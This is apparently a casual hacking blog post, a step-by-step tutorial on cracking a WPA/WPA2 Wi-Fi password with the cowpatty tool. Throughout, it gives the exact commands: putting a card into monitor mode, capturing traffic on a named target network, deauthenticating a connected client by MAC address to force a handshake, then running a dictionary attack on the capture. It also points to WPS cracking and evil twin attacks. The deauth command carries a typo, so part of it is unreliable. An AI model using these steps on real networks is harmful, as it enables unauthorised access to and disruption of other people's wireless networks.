welcome back to hacking a rise today we are going to talk about how to use cow patty this method is bruteforce slow and way to gain the password me personally i crack the wps or use a evil twin attack but look people want u know how to hack wifi u need to know all methods and tools not y best idea but look here we are hahahahahaha fuck it
WHAT IS COW PATTY
Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.
(tip: use a usb WiFi card )
HOW TO USE
right first we need put the card in to monitor mode so open a terminal and type
airmon-ng start wlan1
Now we start airodump-ng in the simple way this is to scan network signals in the air like hidden wifi signals so open terminal and type
airodump-ng wlan1mon
now we open a new terminal and run airodump-ng on the channel of the target since my target is HUAWEI-B525-FD28 we will be using channel 8 so type and close the other airodump terminal
airodump-ng -c 8 --write HUAWEI-B525-FD28 wlan1mon
now we have are target wifi so we need to get a handshake so we are going to kick someone of the wifi to force the to sign back in so open new terminal and type this
airplay-ng -o 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon
when u get the handshake it will pop out on the terminal with airodump-ng running
(Note
you cant crack the wifi with out the handshake )
so now we get to the point were we need to crack the .cap file for the password so now type
cowpatty -r HUAWEI-B525-FD28-03.cap -f wordlist.txt -s HUAWEI-B525-FD28
note
this one the slowest methods so dont be saying it dont work that im shit resson been the wordlist u provided did not have the password so there for why i can stress hack the wps to get the wpa2 password check here for the ——> <---------
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.